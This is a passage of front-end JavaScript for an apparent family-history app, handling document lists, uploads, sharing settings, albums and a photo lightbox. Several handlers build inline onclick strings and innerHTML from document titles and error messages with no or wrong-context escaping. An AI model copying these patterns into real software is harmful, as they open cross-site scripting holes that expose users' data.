                mediaListDiv.innerHTML = `<p class="text-error">Could not load media. ${escapeHtml(error.message)}</p>`;
            }
        }

        // Documents state
        let allDocuments = [];
        let documentsView = 'list'; // 'grid' or 'list'

        function getFileTypeIcon(fileType) {
            const type = (fileType || '').toLowerCase();
            if (type.includes('pdf')) {
                return `<svg class="w-8 h-8 text-red-500" fill="currentColor" viewBox="0 0 20 20"><path d="M4 18h12V6h-4V2H4v16zm-2 1V0h10l6 6v14H2zm11-3h4v-2h-4v2zm0-4h4v-2h-4v2zm0-4h4V6h-4v2z"/></svg>`;
            } else if (type.includes('doc') || type.includes('word')) {
                return `<svg class="w-8 h-8 text-blue-600" fill="currentColor" viewBox="0 0 20 20"><path d="M4 18h12V6h-4V2H4v16zm9-11h3l-4-4v3a1 1 0 001 1z"/></svg>`;
            } else if (type.includes('xls') || type.includes('sheet')) {
                return `<svg class="w-8 h-8 text-green-600" fill="currentColor" viewBox="0 0 20 20"><path d="M4 18h12V6h-4V2H4v16zm9-11h3l-4-4v3a1 1 0 001 1z"/></svg>`;
            } else if (type.includes('image') || type.includes('png') || type.includes('jpg') || type.includes('jpeg') || type.includes('gif')) {
                return `<svg class="w-8 h-8 text-purple-500" fill="currentColor" viewBox="0 0 20 20"><path d="M4 18h12V6h-4V2H4v16zM14 7h2l-4-4v3a1 1 0 001 1zm-4 4a2 2 0 11-4 0 2 2 0 014 0zm5 5H5l3-3 2 2 2-2 3 3z"/></svg>`;
            } else if (type.includes('zip') || type.includes('rar')) {
                return `<svg class="w-8 h-8 text-yellow-600" fill="currentColor" viewBox="0 0 20 20"><path d="M4 18h12V6h-4V2H4v16zm8-12h2V4h-2v2zm0 2h2V6h-2v2zm-2 0h2V6h-2v2zm0 2h2V8h-2v2zm2 0h2V8h-2v2zm0 2h2v-2h-2v2z"/></svg>`;
            } else {
                return `<svg class="w-8 h-8 text-gray-500" fill="currentColor" viewBox="0 0 20 20"><path d="M4 18h12V6h-4V2H4v16zm9-11h3l-4-4v3a1 1 0 001 1z"/></svg>`;
            }
        }

        function getFileTypeCategory(fileType) {
            const type = (fileType || '').toLowerCase();
            if (type.includes('pdf')) return 'pdf';
            if (type.includes('image') || type.includes('png') || type.includes('jpg') || type.includes('jpeg') || type.includes('gif')) return 'image';
            if (type.includes('doc') || type.includes('word')) return 'document';
            if (type.includes('xls') || type.includes('sheet')) return 'spreadsheet';
            return 'other';
        }

        function setDocumentsView(view) {
            documentsView = view;
            const gridBtn = document.getElementById('view-grid-btn');
            const listBtn = document.getElementById('view-list-btn');
            const gridContainer = document.getElementById('documents-grid');
            const listContainer = document.getElementById('documents-list');

            if (view === 'grid') {
                gridBtn.classList.add('bg-white', 'text-primary');
                gridBtn.classList.remove('text-gray-600');
                listBtn.classList.remove('bg-white', 'text-primary');
                listBtn.classList.add('text-gray-600');
                gridContainer.style.display = 'grid';
                listContainer.style.display = 'none';
            } else {
                listBtn.classList.add('bg-white', 'text-primary');
                listBtn.classList.remove('text-gray-600');
                gridBtn.classList.remove('bg-white', 'text-primary');
                gridBtn.classList.add('text-gray-600');
                gridContainer.style.display = 'none';
                listContainer.style.display = 'block';
            }

            renderDocuments();
        }

        function filterDocuments() {
            renderDocuments();
        }

        function renderDocuments() {
            const searchTerm = document.getElementById('documents-search')?.value.toLowerCase() || '';
            const typeFilter = document.getElementById('documents-type-filter')?.value || '';
            const personFilter = document.getElementById('documents-person-filter')?.value || '';

            let filtered = allDocuments.filter(doc => {
                const matchesSearch = !searchTerm ||
                    doc.title.toLowerCase().includes(searchTerm) ||
                    (doc.description && doc.description.toLowerCase().includes(searchTerm));

                const matchesType = !typeFilter || getFileTypeCategory(doc.fileType) === typeFilter;

                const matchesPerson = !personFilter ||
                    (personFilter === 'user-level' && !doc.person) ||
                    (personFilter === 'shared-with-me' && doc.accessType === 'shared') ||
                    (doc.person && doc.person.id == personFilter);

                return matchesSearch && matchesType && matchesPerson;
            });

            if (documentsView === 'grid') {
                renderDocumentsGrid(filtered);
            } else {
                renderDocumentsList(filtered);
            }
        }

        function renderDocumentsGrid(documents) {
            const gridContainer = document.getElementById('documents-grid');
            if (!gridContainer) return;

            if (documents.length === 0) {
                gridContainer.innerHTML = `
                    <div class="col-span-full text-center py-12">
                        <div class="text-6xl mb-4">📁</div>
                        <h3 class="text-lg font-semibold text-gray-700 mb-2">No documents found</h3>
                        <p class="text-gray-500 mb-4">Upload your first document to get started</p>
                        <button onclick="openModal('upload-media-modal')" class="btn btn-primary">
                            + Upload Document
                        </button>
                    </div>
                `;
            } else {
                gridContainer.innerHTML = documents.map(doc => `
                    <div class="bg-white rounded-lg shadow-sm border border-gray-200 hover:shadow-md hover:border-primary transition-all overflow-hidden group relative">
                        <!-- Action Buttons (Top Right) -->
                        ${doc.isOwner ? `
                        <button onclick="event.stopPropagation(); openShareModal(${doc.id}, '${doc.title.replace(/'/g, "\\'")}');"
                                class="absolute top-2 right-14 z-10 bg-blue-600 hover:bg-blue-700 text-white p-2 rounded-full opacity-0 group-hover:opacity-100 transition-opacity shadow-lg"
                                title="Share">
                            ${tablerIcon('share', { size: 16, preserveColor: true })}
                        </button>
                        <button onclick="event.stopPropagation(); deleteDocument(${doc.id}, '${doc.title.replace(/'/g, "\\'")}');"
                                class="absolute top-2 right-2 z-10 bg-red-600 hover:bg-red-700 text-white p-2 rounded-full opacity-0 group-hover:opacity-100 transition-opacity shadow-lg"
                                title="Delete">
                            ${tablerIcon('trash', { size: 16, preserveColor: true })}
                        </button>
                        ` : ''}

                        <!-- File Icon -->
                        <div class="flex items-center justify-center h-32 bg-gradient-to-br from-gray-50 to-gray-100 border-b border-gray-200">
                            ${getFileTypeIcon(doc.fileType)}
                        </div>

                        <!-- Document Info -->
                        <div class="p-4">
                            <div class="flex items-center gap-2 mb-1">
                                <h3 class="font-semibold text-gray-800 truncate">${escapeHtml(doc.title)}</h3>
                                ${doc.accessType === 'shared' ? '<span class="flex-shrink-0 text-xs px-2 py-0.5 bg-blue-100 text-blue-700 rounded-full">Shared with you</span>' : ''}
                                ${doc.isOwner && doc.privacy === 'family' ? '<span class="flex-shrink-0 text-xs px-2 py-0.5 bg-green-100 text-green-700 rounded-full">Family</span>' : ''}
                                ${doc.isOwner && doc.privacy === 'public' ? '<span class="flex-shrink-0 text-xs px-2 py-0.5 bg-purple-100 text-purple-700 rounded-full">Public</span>' : ''}
                            </div>
                            ${doc.description ? `<p class="text-sm text-gray-600 line-clamp-2 mb-2">${escapeHtml(doc.description)}</p>` : ''}
                            <div class="flex items-center justify-between text-xs text-gray-500 mt-3">
                                <span>${doc.person ? `${escapeHtml(doc.person.first_name)} ${escapeHtml(doc.person.last_name)}` : 'My Documents'}</span>
                                <span>${new Date(doc.uploadedAt).toLocaleDateString()}</span>
                            </div>

                            <!-- Action Buttons -->
                            <div class="mt-3 flex gap-2">
                                <button onclick="viewMediaItem('${doc.gcs_filename}')" class="flex-1 px-3 py-2 text-sm font-medium text-white bg-primary hover:bg-opacity-90 rounded-md transition-colors">
                                    View
                                </button>
                                <button onclick="downloadDocument('${doc.gcs_filename}', '${escapeHtml(doc.title)}')" class="flex-1 px-3 py-2 text-sm font-medium text-gray-700 bg-gray-100 hover:bg-gray-200 rounded-md transition-colors">
                                    Download
                                </button>
                            </div>
                        </div>
                    </div>
                `).join('');
            }
        }

        function renderDocumentsList(documents) {
            const tableBody = document.getElementById('documents-table-body');
            if (!tableBody) return;

            if (documents.length === 0) {
                tableBody.innerHTML = `
                    <tr>
                        <td colspan="5" class="p-12 text-center">
                            <div class="text-6xl mb-4">📁</div>
                            <h3 class="text-lg font-semibold text-gray-700 mb-2">No documents found</h3>
                            <p class="text-gray-500 mb-4">Upload your first document to get started</p>
                            <button onclick="openModal('upload-media-modal')" class="btn btn-primary">
                                + Upload Document
                            </button>
                        </td>
                    </tr>
                `;
            } else {
                tableBody.innerHTML = documents.map(doc => `
                    <tr class="border-b hover:bg-gray-50 transition-colors">
                        <td class="p-4">
                            <div class="flex items-center gap-3">
                                <div class="flex-shrink-0">
                                    ${getFileTypeIcon(doc.fileType)}
                                </div>
                                <div>
                                    <div class="flex items-center gap-2">
                                        <div class="font-semibold text-gray-800">${escapeHtml(doc.title)}</div>
                                        ${doc.accessType === 'shared' ? '<span class="text-xs px-2 py-0.5 bg-blue-100 text-blue-700 rounded-full">Shared with you</span>' : ''}
                                        ${doc.isOwner && doc.privacy === 'family' ? '<span class="text-xs px-2 py-0.5 bg-green-100 text-green-700 rounded-full">Family</span>' : ''}
                                        ${doc.isOwner && doc.privacy === 'public' ? '<span class="text-xs px-2 py-0.5 bg-purple-100 text-purple-700 rounded-full">Public</span>' : ''}
                                    </div>
                                    ${doc.description ? `<div class="text-sm text-gray-600 line-clamp-1">${escapeHtml(doc.description)}</div>` : ''}
                                </div>
                            </div>
                        </td>
                        <td class="p-4 text-gray-600">${doc.person ? `${escapeHtml(doc.person.first_name)} ${escapeHtml(doc.person.last_name)}` : 'My Documents'}</td>
                        <td class="p-4 text-gray-600">${doc.fileType}</td>
                        <td class="p-4 text-gray-600">${new Date(doc.uploadedAt).toLocaleDateString()}</td>
                        <td class="p-4">
                            <div class="flex items-center gap-2">
                                <button onclick="viewMediaItem('${doc.gcs_filename}')" class="px-3 py-1 text-sm font-medium text-primary hover:bg-primary hover:text-white rounded transition-colors" title="View">
                                    ${tablerIcon('eye', { size: 16, preserveColor: true })}
                                </button>
                                <button onclick="downloadDocument('${doc.gcs_filename}', '${escapeHtml(doc.title)}')" class="px-3 py-1 text-sm font-medium text-gray-600 hover:bg-gray-100 rounded transition-colors" title="Download">
                                    ${tablerIcon('download', { size: 16, preserveColor: true })}
                                </button>
                                ${doc.isOwner ? `<button onclick="openShareModal(${doc.id}, '${doc.title.replace(/'/g, "\\'")}');" class="px-3 py-1 text-sm font-medium text-blue-600 hover:bg-blue-50 rounded transition-colors" title="Share">
                                    ${tablerIcon('share', { size: 16, preserveColor: true })}
                                </button>` : ''}
                                ${doc.isOwner ? `<button onclick="deleteDocument(${doc.id}, '${doc.title.replace(/'/g, "\\'")}');" class="px-3 py-1 text-sm font-medium text-red-600 hover:bg-red-50 rounded transition-colors" title="Delete">
                                    ${tablerIcon('trash', { size: 16, preserveColor: true })}
                                </button>` : ''}
                            </div>
                        </td>
                    </tr>
                `).join('');
            }
        }

        async function fetchAndRenderAllMedia() {
            const tableBody = document.getElementById('documents-table-body');
            const gridContainer = document.getElementById('documents-grid');

            if (tableBody) {
                tableBody.innerHTML = `<tr><td colspan="5" class="p-8 text-center text-gray-500">Loading documents...</td></tr>`;
            }
            if (gridContainer) {
                gridContainer.innerHTML = `<div class="col-span-full text-center py-8 text-gray-500">Loading documents...</div>`;
            }

            try {
                const mediaItems = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/documents`);
                allDocuments = mediaItems;

                // Populate person filter dropdown
                const personFilter = document.getElementById('documents-person-filter');
                if (personFilter && appState.personsInTree) {
                    const people = appState.personsInTree.map(p =>
                        `<option value="${p.id}">${escapeHtml(p.first_name)} ${escapeHtml(p.last_name)}</option>`
                    ).join('');
                    personFilter.innerHTML = `
                        <option value="">All Documents</option>
                        <option value="user-level">My Documents</option>
                        ${people}
                    `;
                }

                // Initialize view (default to list)
                setDocumentsView('list');
            } catch (error) {
                console.error("Error fetching all media:", error);
                if (tableBody) {
                    tableBody.innerHTML = `<tr><td colspan="5" class="p-8 text-center text-error">Could not load documents: ${escapeHtml(error.message)}</td></tr>`;
                }
                if (gridContainer) {
                    gridContainer.innerHTML = `<div class="col-span-full text-center py-8 text-error">Could not load documents: ${escapeHtml(error.message)}</div>`;
                }
            }
        }

        async function handleMediaUpload(event) {
            event.preventDefault();
            const errorDiv = document.getElementById('upload-media-error');
            errorDiv.textContent = '';
            try {
                const personIdField = document.getElementById('media-attach-person');
                const personId = personIdField ? personIdField.value : document.getElementById('media-person-id').value;
                const fileInput = document.getElementById('media-file');
                const file = fileInput.files[0];
                if (!file) throw new Error("Please select a file.");

                const formData = new FormData();
                formData.append('file', file);
                formData.append('title', document.getElementById('media-title').value || file.name);
                formData.append('description', document.getElementById('media-description').value);

                // Pass person_id if uploading for a specific person
                if (personId) {
                    formData.append('person_id', personId);
                }

                // Use user-level documents endpoint
                const url = `${API_BASE_URL}/users/${appState.currentUserNeo4jId}/documents`;

                await apiFetch(url, { method: 'POST', body: formData });

                closeModal('upload-media-modal');
                if (appState.currentView === 'documents-view') {
                    await fetchAndRenderAllMedia();
                } else if (appState.currentView === 'person-detail-view') {
                    await fetchAndRenderMedia(personId);
                }
            } catch (error) {
                console.error("Media upload error:", error);
                errorDiv.textContent = error.message;
            }
        }
        
        async function viewMediaItem(gcsFilename) {
            try {
                const urlResponse = await apiFetch(`${API_BASE_URL}/photos/generate-signed-url`, { method: 'POST', body: { filename: gcsFilename } });
                window.open(urlResponse.signed_url, '_blank');
            } catch (error) {
                alert('Could not open file. ' + error.message);
            }
        }

        async function downloadDocument(gcsFilename, title) {
            try {
                const urlResponse = await apiFetch(`${API_BASE_URL}/photos/generate-signed-url`, { method: 'POST', body: { filename: gcsFilename } });

                // Create a temporary anchor element to trigger download
                const link = document.createElement('a');
                link.href = urlResponse.signed_url;
                link.download = title || 'document';
                // Don't use target='_blank' - it prevents proper download behavior
                document.body.appendChild(link);
                link.click();
                document.body.removeChild(link);
            } catch (error) {
                alert('Could not download file. ' + error.message);
            }
        }

        async function deleteDocument(mediaId, title) {
            if (!confirm(`Are you sure you want to delete "${title}"? This action cannot be undone.`)) {
                return;
            }

            try {
                await apiFetch(`${API_BASE_URL}/media/${mediaId}`, { method: 'DELETE' });

                // Remove from local array
                allDocuments = allDocuments.filter(doc => doc.id !== mediaId);

                // Re-render the current view
                renderDocuments();
            } catch (error) {
                alert(`Failed to delete document: ${error.message}`);
            }
        }

        // Sharing functionality
        let currentSharingMediaId = null;

        async function openShareModal(mediaId, title) {
            currentSharingMediaId = mediaId;
            openModal('share-document-modal');

            const contentDiv = document.getElementById('share-document-content');
            contentDiv.innerHTML = '<p class="text-gray-500 text-center py-4">Loading sharing options...</p>';

            try {
                // Fetch current shares and family members in parallel
                const [sharesData, familyMembers] = await Promise.all([
                    apiFetch(`${API_BASE_URL}/media/${mediaId}/shares`),
                    apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/family-members`)
                ]);

                const { privacy, shared_with } = sharesData;
                const sharedUserIds = new Set(shared_with.map(u => u.id));

                contentDiv.innerHTML = `
                    <div class="mb-6">
                        <h3 class="text-lg font-semibold mb-2">${title}</h3>

                        <!-- Privacy Level -->
                        <div class="mb-4">
                            <label class="block text-sm font-medium text-gray-700 mb-2">Privacy Level</label>
                            <select id="privacy-select" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                <option value="private" ${privacy === 'private' ? 'selected' : ''}>Private (Only me)</option>
                                <option value="family" ${privacy === 'family' ? 'selected' : ''}>Family (All family members)</option>
                                <option value="public" ${privacy === 'public' ? 'selected' : ''}>Public (Anyone with link)</option>
                            </select>
                        </div>

                        <!-- Share with specific people -->
                        <div class="mb-4">
                            <label class="block text-sm font-medium text-gray-700 mb-2">Share with specific people</label>
                            <div class="max-h-64 overflow-y-auto border border-gray-200 rounded-md">
                                ${familyMembers.length === 0 ?
                                    '<p class="text-gray-500 text-sm p-4">No family members found</p>' :
                                    familyMembers.map(member => `
                                        <label class="flex items-center p-3 hover:bg-gray-50 cursor-pointer border-b border-gray-100 last:border-b-0">
                                            <input type="checkbox"
                                                   class="share-checkbox mr-3 h-4 w-4 text-primary focus:ring-primary border-gray-300 rounded"
                                                   data-user-id="${member.id}"
                                                   ${sharedUserIds.has(member.id) ? 'checked' : ''}>
                                            <div class="flex-1">
                                                <div class="font-medium text-gray-800">${escapeHtml(member.name || member.email || 'Unknown User')}</div>
                                                ${member.email ? `<div class="text-sm text-gray-500">${escapeHtml(member.email)}</div>` : ''}
                                            </div>
                                        </label>
                                    `).join('')
                                }
                            </div>
                        </div>

                        <!-- Action Buttons -->
                        <div class="flex justify-end gap-3 mt-6">
                            <button onclick="closeModal('share-document-modal')"
                                    class="px-4 py-2 text-gray-700 bg-gray-100 hover:bg-gray-200 rounded-md transition-colors">
                                Cancel
                            </button>
                            <button onclick="saveSharing()"
                                    class="px-4 py-2 text-white bg-primary hover:bg-opacity-90 rounded-md transition-colors">
                                Save Changes
                            </button>
                        </div>
                    </div>
                `;
            } catch (error) {
                contentDiv.innerHTML = `
                    <div class="text-center py-8">
                        <p class="text-red-600 mb-4">Failed to load sharing options: ${error.message}</p>
                        <button onclick="closeModal('share-document-modal')"
                                class="px-4 py-2 text-white bg-primary rounded-md">
                            Close
                        </button>
                    </div>
                `;
            }
        }

        async function saveSharing() {
            if (!currentSharingMediaId) return;

            try {
                // Get selected privacy level BEFORE replacing content
                const privacy = document.getElementById('privacy-select').value;

                // Get selected users BEFORE replacing content
                const checkboxes = document.querySelectorAll('.share-checkbox');
                const selectedUserIds = Array.from(checkboxes)
                    .filter(cb => cb.checked)
                    .map(cb => parseInt(cb.dataset.userId));

                // Now replace content with loading message
                const contentDiv = document.getElementById('share-document-content');
                const originalContent = contentDiv.innerHTML;
                contentDiv.innerHTML = '<p class="text-gray-500 text-center py-4">Saving changes...</p>';

                // Save sharing settings
                await apiFetch(`${API_BASE_URL}/media/${currentSharingMediaId}/share`, {
                    method: 'POST',
                    body: {
                        privacy: privacy,
                        user_ids: selectedUserIds
                    }
                });

                // Update local document data if needed
                const docIndex = allDocuments.findIndex(d => d.id === currentSharingMediaId);
                if (docIndex !== -1) {
                    allDocuments[docIndex].privacy = privacy;
                }

                closeModal('share-document-modal');
                renderDocuments(); // Refresh to show any sharing indicators
            } catch (error) {
                contentDiv.innerHTML = originalContent;
                alert(`Failed to save sharing settings: ${error.message}`);
            }
        }

        async function fetchAndRenderAlbums() {
            const albumListDiv = document.getElementById('album-list');
            if (!albumListDiv) return;
            albumListDiv.innerHTML = `<p class="text-gray-500 col-span-full text-center py-8">Loading albums...</p>`;
            try {
                const albums = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/albums`);
                albums.sort((a, b) => (a.isDefault === true) ? -1 : (b.isDefault === true) ? 1 : 0);

                if (albums.length === 0) {
                    albumListDiv.innerHTML = `<div class="col-span-full">${ebwEmptyState({
                        icon: 'photo',
                        heading: 'No albums yet',
                        body: 'Group photos by occasion, person, or theme. Weddings, family reunions, quiet Sundays.',
                        primaryAction: { label: '+ Create album', onclick: "openModal('create-album-modal')" },
                        learnMoreAnchor: 'photos',
                    })}</div>`;
                } else {
                    // TODO(backend): N+1 on album list — currently fires N x
                    // GET /albums/<id>/photos + N x POST /photos/generate-
                    // signed-url. Real fix: extend get_user_albums to return
                    // photoCount + cover_gcs_filename inline (Cypher aggregate
                    // + subquery for cover), and mint the cover signed URL in
                    // the same response. Leaving the frontend concurrency cap
                    // as an interim mitigation — capped at 3 concurrent per
                    // batch so we don't hammer Cloud Run or Aura when a user
                    // has many albums. See Photos-arc Prompt 7 assessment.
                    async function _mapWithLimit(items, limit, mapper) {
                        const results = new Array(items.length);
                        let cursor = 0;
                        const workers = Array.from({ length: Math.min(limit, items.length) }, async () => {
                            while (cursor < items.length) {
                                const i = cursor++;
                                results[i] = await mapper(items[i], i);
                            }
                        });
                        await Promise.all(workers);
                        return results;
                    }
                    const albumsWithPhotos = await _mapWithLimit(albums, 3, async (album) => {
                        try {
                            const photos = await apiFetch(`${API_BASE_URL}/albums/${album.id}/photos`);
                            let coverPhotoUrl = null;
                            if (photos.length > 0) {
                                const urlResponse = await apiFetch(`${API_BASE_URL}/photos/generate-signed-url`, {
                                    method: 'POST',
                                    body: { filename: photos[0].gcs_filename }
                                });
                                coverPhotoUrl = urlResponse.signed_url;
                            }
                            return {
                                ...album,
                                photoCount: photos.length,
                                coverPhotoUrl
                            };
                        } catch (e) {
                            return { ...album, photoCount: 0, coverPhotoUrl: null };
                        }
                    });

                    // Data-attribute-driven: outer wrapper carries
                    // data-album-id + data-album-title (HTML-escaped, so
                    // apostrophe / double-quote / <>& round-trip safely
                    // through the attribute). Inline handlers delegate to
                    // openAlbumFromEl / deleteAlbumFromEl which read the
                    // raw title back from the wrapper's dataset — no
                    // interpolation of user text into JS string literals.
                    albumListDiv.innerHTML = albumsWithPhotos.map(a => `
                        <div class="bg-white rounded-lg shadow-sm border border-gray-200 hover:shadow-md hover:border-primary transition-all overflow-hidden group relative"
                             data-album-id="${a.id}"
                             data-album-title="${escapeHtml(a.title || '')}"
                             data-album-description="${escapeHtml(a.description || '')}"
                             data-album-is-default="${a.isDefault ? 'true' : 'false'}">
                            <!-- Delete + Rename + Share buttons — non-default only.
                                 Share is Prompt 15 addition; sits to the right of
                                 the pencil so the trash button stays visually
                                 anchored top-left (the most destructive action). -->
                            ${!a.isDefault ? `
                                <button type="button" onclick="deleteAlbumFromEl(this, event)" aria-label="Delete album"
                                        class="absolute top-2 left-2 z-10 bg-red-600 hover:bg-red-700 text-white p-2 rounded-full opacity-100 md:opacity-0 md:group-hover:opacity-100 transition-opacity shadow-lg">
                                    ${tablerIcon('trash', { size: 16, preserveColor: true })}
                                </button>
                                <button type="button" onclick="openRenameAlbumFromEl(this, event)" aria-label="Rename album" title="Rename album"
                                        class="ebw-album-rename-btn absolute top-2 left-12 z-10 bg-gray-700 hover:bg-gray-800 text-white p-2 rounded-full opacity-100 md:opacity-0 md:group-hover:opacity-100 transition-opacity shadow-lg">
                                    ${tablerIcon('pencil', { size: 16, preserveColor: true })}
                                </button>
                                <button type="button" onclick="openShareAlbumFromEl(this, event)" aria-label="Share album" title="Share album"
                                        class="ebw-album-share-btn absolute top-2 left-[5.5rem] z-10 bg-blue-600 hover:bg-blue-700 text-white p-2 rounded-full opacity-100 md:opacity-0 md:group-hover:opacity-100 transition-opacity shadow-lg">
                                    ${tablerIcon('share', { size: 16, preserveColor: true })}
                                </button>
                            ` : ''}

                            <!-- Cover Photo (Clickable) -->
                            <div onclick="openAlbumFromEl(this)"
                                 class="aspect-video bg-gradient-to-br from-gray-100 to-gray-200 relative overflow-hidden cursor-pointer">
                                ${a.coverPhotoUrl ?
                                    `<img src="${a.coverPhotoUrl}" alt="${escapeHtml(a.title || '')}" class="w-full h-full object-cover group-hover:scale-105 transition-transform duration-300" onerror="_imgFallback(this, 'photo')">` :
                                    `<div class="flex items-center justify-center h-full">
                                        ${tablerIcon('photo', { size: 64, preserveColor: true })}
                                    </div>`
                                }
                                <!-- Photo Count Badge -->
                                <div class="absolute top-2 right-2 bg-black bg-opacity-70 text-white text-xs px-2 py-1 rounded-full">
                                    ${a.photoCount} photo${a.photoCount !== 1 ? 's' : ''}
                                </div>
                            </div>

                            <!-- Album Info (Clickable) -->
                            <div onclick="openAlbumFromEl(this)"
                                 class="p-4 cursor-pointer">
                                <h3 class="font-semibold text-lg text-gray-800 truncate group-hover:text-primary transition-colors">${escapeHtml(a.title || '')}</h3>
                                ${a.description ? `<p class="text-sm text-gray-600 mt-1 line-clamp-2">${escapeHtml(a.description)}</p>` : ''}
                                ${a.createdAt ? `<p class="text-xs text-gray-400 mt-2">Created ${new Date(a.createdAt).toLocaleDateString()}</p>` : ''}
                            </div>
                        </div>
                    `).join('');
                }
            } catch (e) {
                albumListDiv.innerHTML = `<p class="text-error col-span-full text-center">Could not load albums: ${escapeHtml(e.message)}</p>`;
            }
        }
        // Photo lightbox state
        let currentAlbumPhotos = [];
        let currentPhotoIndex = 0;
        let currentAlbumId = null; // Track current album for delete operations

        // Lightbox zoom state (F18 pinch-zoom pass 2026-07-18). NO CSS transition
        // on transform — transitions during gestures produce the compositor
        // flash the user reported ("black tiles"). Transform-origin is
        // center center; translate is applied AFTER scale in transform order
        // via `translate(...) scale(...)`. Reset in updateLightboxPhoto and
        // closePhotoLightbox so every photo starts at 1x centered.
        let _lbScale = 1;
        let _lbTx = 0;
        let _lbTy = 0;

        function _applyLightboxTransform() {
            const img = document.getElementById('lightbox-image');
            if (!img) return;
            img.style.transformOrigin = 'center center';
            img.style.transform = `translate(${_lbTx}px, ${_lbTy}px) scale(${_lbScale})`;
        }

        function _resetLightboxZoom() {
            _lbScale = 1;
            _lbTx = 0;
            _lbTy = 0;
            const img = document.getElementById('lightbox-image');
            if (img) {
                img.style.transform = '';
                img.style.transformOrigin = '';
                img.style.willChange = '';
            }
        }

        // Zero-arg wrapper for the lightbox AI Describe button. The button's
        // inline onclick can't reach these module-scoped state vars (only
        // window is in inline-handler scope), so we route through a wrapper
        // exposed on window instead. No-op when the lightbox is empty.
        function aiDescribeCurrentPhoto() {
            const photo = currentAlbumPhotos[currentPhotoIndex];
            if (!photo || !photo.id) return;
            aiDescribePhoto(photo.id);
        }

        // Prompt 15: "Shared with you" section on the Photos page.
        // Fetches from GET /users/<id>/shared-albums (backend Prompt 14).
        // Header + grid stay hidden when the response is empty so a
        // solo user with no shared albums sees no phantom section.
        // Cards reuse the album-card layout minus delete/pencil/share,
        // plus attribution ("from {ownerFirstName}") and a small role
        // badge for contributors. Opening navigates to album-detail-view
        // with params.sharedRole so the downstream role gating fires.
        async function fetchAndRenderSharedAlbums() {
            const section = document.getElementById('shared-albums-section');
            const grid = document.getElementById('shared-album-list');
            const count = document.getElementById('shared-albums-count');
            if (!section || !grid) return;
            try {
                const shared = await apiFetch(`${API_BASE_URL}/users/${appState.currentUserNeo4jId}/shared-albums`);
                if (!Array.isArray(shared) || shared.length === 0) {
                    section.classList.add('hidden');
                    grid.innerHTML = '';
                    return;
                }
                section.classList.remove('hidden');
                if (count) count.textContent = `(${shared.length})`;

                // N+1 same-shape concern as fetchAndRenderAlbums — cap
                // concurrency at 3 (see the Prompt 7 comment there).
                async function _mapWithLimit(items, limit, mapper) {
                    const results = new Array(items.length);
                    let cursor = 0;
                    const workers = Array.from({ length: Math.min(limit, items.length) }, async () => {
                        while (cursor < items.length) {
                            const i = cursor++;
                            results[i] = await mapper(items[i], i);
                        }
                    });
                    await Promise.all(workers);
                    return results;
                }
                const withPhotos = await _mapWithLimit(shared, 3, async (entry) => {
                    try {
                        const photos = await apiFetch(`${API_BASE_URL}/albums/${entry.album.id}/photos`);
                        let coverPhotoUrl = null;
                        if (photos.length > 0) {
                            const urlResponse = await apiFetch(`${API_BASE_URL}/photos/generate-signed-url`, {
                                method: 'POST',
                                body: { filename: photos[0].gcs_filename }
                            });
                            coverPhotoUrl = urlResponse.signed_url;
                        }
                        return { ...entry, photoCount: photos.length, coverPhotoUrl };
                    } catch (e) {
                        return { ...entry, photoCount: 0, coverPhotoUrl: null };
                    }
                });

                grid.innerHTML = withPhotos.map((entry) => {
                    const a = entry.album || {};
                    const owner = entry.owner || {};
                    const ownerFirst = (owner.firstName || '').trim() || 'Family';
                    const isContributor = entry.role === 'contributor';
                    return `
                        <div class="bg-white rounded-lg shadow-sm border border-gray-200 hover:shadow-md hover:border-primary transition-all overflow-hidden group relative cursor-pointer"
                             data-shared-album-id="${a.id}"
                             data-shared-album-title="${escapeHtml(a.title || '')}"
                             data-shared-album-description="${escapeHtml(a.description || '')}"
                             data-shared-role="${escapeHtml(entry.role || 'viewer')}"
                             onclick="openSharedAlbumFromEl(this)">
                            <div class="aspect-video bg-gradient-to-br from-gray-100 to-gray-200 relative overflow-hidden">
                                ${a.coverPhotoUrl || entry.coverPhotoUrl ?
                                    `<img src="${entry.coverPhotoUrl}" alt="${escapeHtml(a.title || '')}" class="w-full h-full object-cover group-hover:scale-105 transition-transform duration-300" onerror="_imgFallback(this, 'photo')">` :
                                    `<div class="flex items-center justify-center h-full">
                                        ${tablerIcon('photo', { size: 64, preserveColor: true })}
                                    </div>`}
                                <div class="absolute top-2 right-2 bg-black bg-opacity-70 text-white text-xs px-2 py-1 rounded-full">
                                    ${entry.photoCount || 0} photo${entry.photoCount === 1 ? '' : 's'}
                                </div>
                            </div>
                            <div class="p-4">
                                <h3 class="font-semibold text-lg text-gray-800 truncate group-hover:text-primary transition-colors">${escapeHtml(a.title || '')}</h3>
                                <p class="text-xs text-gray-500 mt-1">from ${escapeHtml(ownerFirst)}</p>
                                ${isContributor ? `
                                    <span class="mt-2 inline-flex items-center gap-1 text-xs px-2 py-0.5 rounded-full bg-blue-100 text-blue-800">
                                        ${tablerIcon('share', { size: 12, preserveColor: true })}
                                        Contributor
                                    </span>
                                ` : ''}
                            </div>
                        </div>
                    `;
                }).join('');
            } catch (e) {
                console.error('Error loading shared albums:', e);
                section.classList.add('hidden');
                grid.innerHTML = '';
            }
        }
        function openSharedAlbumFromEl(el) {
            const wrapper = el && el.closest && el.closest('[data-shared-album-id]');
            if (!wrapper) return;
            const albumId = parseInt(wrapper.dataset.sharedAlbumId, 10);
            if (Number.isNaN(albumId)) return;
            const albumTitle = wrapper.dataset.sharedAlbumTitle || '';
            const albumDescription = wrapper.dataset.sharedAlbumDescription || '';
            const sharedRole = wrapper.dataset.sharedRole || 'viewer';
            navigateToView('album-detail-view', {
                albumId, albumTitle, albumDescription,
                albumIsDefault: false, // shared albums are never the default
                sharedRole,
            });
        }
        window.openSharedAlbumFromEl = openSharedAlbumFromEl;

        // Prompt 15: sharedRole propagates from AlbumDetailPage params
        // → fetchAndRenderPhotos → module-level _currentAlbumSharedRole
        // so downstream openPhotoLightbox and delete-per-photo gating
        // can consult it without threading through every call site.
        // Owner flow (no sharedRole) leaves it null. Reset on every
        // album mount so stale values from a prior album can't leak.
        let _currentAlbumSharedRole = null;
        async function fetchAndRenderPhotos(albumId, sharedRole) {
            currentAlbumId = albumId; // Store for later use
            _currentAlbumSharedRole = sharedRole || null;
            const photoGrid = document.getElementById('photo-grid');
            if (!photoGrid) return;
